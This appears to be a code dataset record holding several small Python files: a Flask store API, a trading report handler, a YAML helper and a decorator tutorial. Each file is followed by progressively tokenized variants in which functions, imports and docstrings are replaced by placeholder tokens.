loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,881 | 65277d8af212eb3b156a00ebb9f5a9c5c11df41c | from flask_restful import Resource, reqparse
from models.store import StoreModel
class Store(Resource):
def get(self, name):
store = StoreModel.find_store_by_name(name)
if store:
return store.json(), 200
return {"messgae": f"{name}store not found"}, 404
def post(self, name):
store = StoreModel.find_store_by_name(name)
if store:
return {"message": f"{name} already exists"}, 400
store = StoreModel(name)
try:
store.save_to_db()
return {"message": "store is created"}, 201
except:
return {"messgae": "an error has occured while saving to db"}, 500
def delete(self, name):
store = StoreModel.find_store_by_name(name)
if store:
try:
store.delete_store()
return {"message": "Store been deleted "}, 200
except:
return {"message": "An error occured while deleting the store"}, 500
return {"message": f"Unable to locate {name}"}, 404
class StoreList(Resource):
def get(self):
return {"stores": list(map(lambda store: store.json(), StoreModel.query.all()))}
| [
"from flask_restful import Resource, reqparse\nfrom models.store import StoreModel\n\n\nclass Store(Resource):\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {\"messgae\": f\"{name}store not found\"}, 404\n\n def post(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return {\"message\": f\"{name} already exists\"}, 400\n\n store = StoreModel(name)\n try:\n store.save_to_db()\n return {\"message\": \"store is created\"}, 201\n except:\n return {\"messgae\": \"an error has occured while saving to db\"}, 500\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {\"message\": \"Store been deleted \"}, 200\n except:\n return {\"message\": \"An error occured while deleting the store\"}, 500\n return {\"message\": f\"Unable to locate {name}\"}, 404\n\n\nclass StoreList(Resource):\n def get(self):\n return {\"stores\": list(map(lambda store: store.json(), StoreModel.query.all()))}\n",
"from flask_restful import Resource, reqparse\nfrom models.store import StoreModel\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n\n def post(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return {'message': f'{name} already exists'}, 400\n store = StoreModel(name)\n try:\n store.save_to_db()\n return {'message': 'store is created'}, 201\n except:\n return {'messgae': 'an error has occured while saving to db'}, 500\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {'message': 'Store been deleted '}, 200\n except:\n return {'message': 'An error occured while deleting the store'\n }, 500\n return {'message': f'Unable to locate {name}'}, 404\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n\n def post(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return {'message': f'{name} already exists'}, 400\n store = StoreModel(name)\n try:\n store.save_to_db()\n return {'message': 'store is created'}, 201\n except:\n return {'messgae': 'an error has occured while saving to db'}, 500\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {'message': 'Store been deleted '}, 200\n except:\n return {'message': 'An error occured while deleting the store'\n }, 500\n return {'message': f'Unable to locate {name}'}, 404\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n <function token>\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {'message': 'Store been deleted '}, 200\n except:\n return {'message': 'An error occured while deleting the store'\n }, 500\n return {'message': f'Unable to locate {name}'}, 404\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n <function token>\n <function token>\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n <function token>\n <function token>\n <function token>\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n<class token>\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n<class token>\n\n\nclass StoreList(Resource):\n <function token>\n",
"<import token>\n<class token>\n<class token>\n"
] | false |
99,882 | 308e740c415225b738d1ed4978391e37c1a2d9b8 | import pandas as pd
from trading_system.portfolio import Portfolio
from .performance import create_drawdowns, create_sharpe_returns
from .report import Report
class ReportHandler:
"""
The ReportHandler class generates reports based on the holdings
data in the Portfolio structure.
"""
def __init__(self, portfolio: Portfolio):
self.portfolio = portfolio
def generate_report(self) -> Report:
"""
Generate a new report from the current portfolio data.
"""
# equity_curve = self._generate_equity_curve()
# summary_stats = self._generate_summary_stats(equity_curve)
# return Report(equity_curve, summary_stats)
pass
#
# def _generate_equity_curve(self):
# """
# Creates a pandas DataFrame from the all_holdings list of dictionaries.
# """
# curve = pd.DataFrame(self.portfolio.all_holdings)
# curve.set_index('datetime', inplace=True)
# curve['returns'] = curve['total'].pct_change()
# curve['equity'] = (1.0+curve['returns']).cumprod()
# return curve
#
# @staticmethod
# def _generate_summary_stats(equity_curve):
# """
# Creates a list of summary statistics for the portfolio such as
# Sharpe Ratio and drawdown information.
# """
# total_return = equity_curve['equity'][-1]
# returns = equity_curve['returns']
# pnl = equity_curve['equity']
#
# sharpe_ratio = create_sharpe_returns(returns)
# max_drawdown, drawdown_duration = create_drawdowns(pnl)
#
# return {'total_return': total_return,
# 'sharpe_ratio': sharpe_ratio,
# 'max_drawdown': max_drawdown,
# 'drawdown_duration': drawdown_duration}
| [
"import pandas as pd\n\nfrom trading_system.portfolio import Portfolio\nfrom .performance import create_drawdowns, create_sharpe_returns\nfrom .report import Report\n\n\nclass ReportHandler:\n \"\"\"\n The ReportHandler class generates reports based on the holdings\n data in the Portfolio structure.\n \"\"\"\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) -> Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n # equity_curve = self._generate_equity_curve()\n # summary_stats = self._generate_summary_stats(equity_curve)\n # return Report(equity_curve, summary_stats)\n pass\n #\n # def _generate_equity_curve(self):\n # \"\"\"\n # Creates a pandas DataFrame from the all_holdings list of dictionaries.\n # \"\"\"\n # curve = pd.DataFrame(self.portfolio.all_holdings)\n # curve.set_index('datetime', inplace=True)\n # curve['returns'] = curve['total'].pct_change()\n # curve['equity'] = (1.0+curve['returns']).cumprod()\n # return curve\n #\n # @staticmethod\n # def _generate_summary_stats(equity_curve):\n # \"\"\"\n # Creates a list of summary statistics for the portfolio such as\n # Sharpe Ratio and drawdown information.\n # \"\"\"\n # total_return = equity_curve['equity'][-1]\n # returns = equity_curve['returns']\n # pnl = equity_curve['equity']\n #\n # sharpe_ratio = create_sharpe_returns(returns)\n # max_drawdown, drawdown_duration = create_drawdowns(pnl)\n #\n # return {'total_return': total_return,\n # 'sharpe_ratio': sharpe_ratio,\n # 'max_drawdown': max_drawdown,\n # 'drawdown_duration': drawdown_duration}\n",
"import pandas as pd\nfrom trading_system.portfolio import Portfolio\nfrom .performance import create_drawdowns, create_sharpe_returns\nfrom .report import Report\n\n\nclass ReportHandler:\n \"\"\"\n The ReportHandler class generates reports based on the holdings\n data in the Portfolio structure.\n \"\"\"\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) ->Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n pass\n",
"<import token>\n\n\nclass ReportHandler:\n \"\"\"\n The ReportHandler class generates reports based on the holdings\n data in the Portfolio structure.\n \"\"\"\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) ->Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n pass\n",
"<import token>\n\n\nclass ReportHandler:\n <docstring token>\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) ->Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n pass\n",
"<import token>\n\n\nclass ReportHandler:\n <docstring token>\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n <function token>\n",
"<import token>\n\n\nclass ReportHandler:\n <docstring token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,883 | 4ae6a43b116167a8590a7a43ea96f6692fce2fa2 | """ helper functions for yaml usage """
class myyaml():
""" myyaml """
_yaml = None
parser = None
def __init__(self):
""" __init__ """
pass
def available(self):
""" available() """
if not myyaml._yaml:
try:
import yaml
myyaml._yaml = yaml
myyaml.parser = yaml.parser
except ImportError:
return False
return True
def safe_load(self,value_string):
""" safe_load() """
return myyaml._yaml.safe_load(value_string)
def safe_dump(self, results):
""" safe_dump() """
return myyaml._yaml.safe_dump(results)
| [
"\"\"\" helper functions for yaml usage \"\"\"\n\nclass myyaml():\n \"\"\" myyaml \"\"\"\n\n _yaml = None\n parser = None\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self,value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n \"\"\" myyaml \"\"\"\n _yaml = None\n parser = None\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n _yaml = None\n parser = None\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n <function token>\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n <function token>\n <function token>\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<class token>\n"
] | false |
99,884 | 8e0c4ae950ec81a9b9570293a5704c3e712d20a6 | # Decorator
"""
Given spam a fn. and eggs a deco
spam = eggs(spam)
def eggs(function):
return function
@eggs
def spam():
pass
"""
"""
Sample Decorator
"""
import functools
# Decorator Function
def print_all_input(function):
@functools.wraps(function)
def aeggs(*args, **kwargs):
print ("args are ", args)
print ('$' * 10)
print ("kwargs are ", kwargs)
print ("NAME OF Function is", function.__name__)
return function(*args, **kwargs)
return aeggs
# Normal func
@print_all_input
def spam(a, b, c):
return a + b + c
print (spam(1, 2, 3))
"""
How decorators used in debug
import somemodule
debug_this_function=debug(somemodule.somefunc)
get debugoutput
debug_this_function()
also
somemodule.somefunc= debug_this_function
Now when u call somemodule.somefunc u will get decorated out
"""
def plus_one(function):
@functools.wraps(function)
def _plus_one(self, n):
return function(self, n + 1)
return _plus_one
class Spam(object):
def __init__(self):
pass
@plus_one
def somefunc(self, n):
print (n)
Spam().somefunc(1)
"""
class method and staticmethod
classmethod passes object and static method skips both instance and object
"""
print ("$" * 10)
class Spam(object):
def __init__(self):
pass
def some_instance(self, *args, **kwargs):
print ('args ', args)
print ('kwargs ', kwargs)
print ('self ', self)
@classmethod
def some_cls_method(cls, *args, **kwargs):
print ('args ', args)
print ('kwargs ', kwargs)
print ('cls ', cls)
@staticmethod
def some_gen_method(*args, **kwargs):
print ('args ', args)
print ('kwargs ', kwargs)
spam = Spam()
spam.some_instance(1, 2, a=5, b=6)
# Spam.some_instance() will through an error
print (spam.some_cls_method(1, 2, a=2, b=3))
Spam.some_cls_method()
"""
args ()
kwargs {}
cls <class '__main__.Spam'>
"""
"""
Extra Arguments in decorator
"""
print ('$' * 10)
def add(extra_n=5):
def _add(function):
@functools.wraps(function)
def __add(n):
print ("hey ", extra_n, n)
return function(n + extra_n)
return __add
return _add
@add(7)
@add(2)
def spam(n):
return n
print (spam(5))
| [
"# Decorator\n\"\"\"\n Given spam a fn. and eggs a deco\n spam = eggs(spam)\n def eggs(function):\n return function\n @eggs\n def spam():\n pass\n\n\"\"\"\n\"\"\"\n Sample Decorator\n\n\"\"\"\n\nimport functools\n# Decorator Function\n\n\ndef print_all_input(function):\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print (\"args are \", args)\n print ('$' * 10)\n print (\"kwargs are \", kwargs)\n\n print (\"NAME OF Function is\", function.__name__)\n\n return function(*args, **kwargs)\n return aeggs\n# Normal func\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\nprint (spam(1, 2, 3))\n\n\"\"\"\nHow decorators used in debug\n\nimport somemodule\ndebug_this_function=debug(somemodule.somefunc)\nget debugoutput\ndebug_this_function()\n\nalso\nsomemodule.somefunc= debug_this_function\nNow when u call somemodule.somefunc u will get decorated out\n\"\"\"\n\n\ndef plus_one(function):\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print (n)\n\nSpam().somefunc(1)\n\n\n\"\"\"\nclass method and staticmethod\nclassmethod passes object and static method skips both instance and object\n\n\n\"\"\"\nprint (\"$\" * 10)\n\n\nclass Spam(object):\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print ('args ', args)\n print ('kwargs ', kwargs)\n print ('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print ('args ', args)\n print ('kwargs ', kwargs)\n print ('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print ('args ', args)\n print ('kwargs ', kwargs)\n\n\nspam = Spam()\nspam.some_instance(1, 2, a=5, b=6)\n# Spam.some_instance() will through an error\nprint (spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n\"\"\"\nargs ()\nkwargs {}\ncls <class '__main__.Spam'>\n\n\"\"\"\n\"\"\"\n Extra Arguments in decorator\n\n\n\"\"\"\nprint ('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n @functools.wraps(function)\n def __add(n):\n print (\"hey \", extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\nprint (spam(5))\n",
"<docstring token>\nimport functools\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\nprint(spam(1, 2, 3))\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\nSpam().somefunc(1)\n<docstring token>\nprint('$' * 10)\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\nspam = Spam()\nspam.some_instance(1, 2, a=5, b=6)\nprint(spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n<docstring token>\nprint('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\nprint(spam(5))\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\nprint(spam(1, 2, 3))\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\nSpam().somefunc(1)\n<docstring token>\nprint('$' * 10)\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\nspam = Spam()\nspam.some_instance(1, 2, a=5, b=6)\nprint(spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n<docstring token>\nprint('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\nprint(spam(5))\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\nprint(spam(1, 2, 3))\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\nSpam().somefunc(1)\n<docstring token>\nprint('$' * 10)\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\nspam.some_instance(1, 2, a=5, b=6)\nprint(spam.some_cls_method(1, 2, a=2, b=3))\nSpam.some_cls_method()\n<docstring token>\nprint('$' * 10)\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\nprint(spam(5))\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n@print_all_input\ndef spam(a, b, c):\n return a + b + c\n\n\n<code token>\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n<function token>\n<code token>\n<docstring token>\n\n\ndef plus_one(function):\n\n @functools.wraps(function)\n def _plus_one(self, n):\n return function(self, n + 1)\n return _plus_one\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef print_all_input(function):\n\n @functools.wraps(function)\n def aeggs(*args, **kwargs):\n print('args are ', args)\n print('$' * 10)\n print('kwargs are ', kwargs)\n print('NAME OF Function is', function.__name__)\n return function(*args, **kwargs)\n return aeggs\n\n\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n\n\ndef add(extra_n=5):\n\n def _add(function):\n\n @functools.wraps(function)\n def __add(n):\n print('hey ', extra_n, n)\n return function(n + extra_n)\n return __add\n return _add\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n\n\n@add(7)\n@add(2)\ndef spam(n):\n return n\n\n\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<code token>\n<docstring token>\n<function token>\n\n\nclass Spam(object):\n <function token>\n\n @plus_one\n def somefunc(self, n):\n print(n)\n\n\n<code token>\n<docstring token>\n<code token>\n\n\nclass Spam(object):\n\n def __init__(self):\n pass\n\n def some_instance(self, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('self ', self)\n\n @classmethod\n def some_cls_method(cls, *args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n print('cls ', cls)\n\n @staticmethod\n def some_gen_method(*args, **kwargs):\n print('args ', args)\n print('kwargs ', kwargs)\n\n\n<assignment token>\n<code token>\n<docstring token>\n<code token>\n<function token>\n<function token>\n<code token>\n",
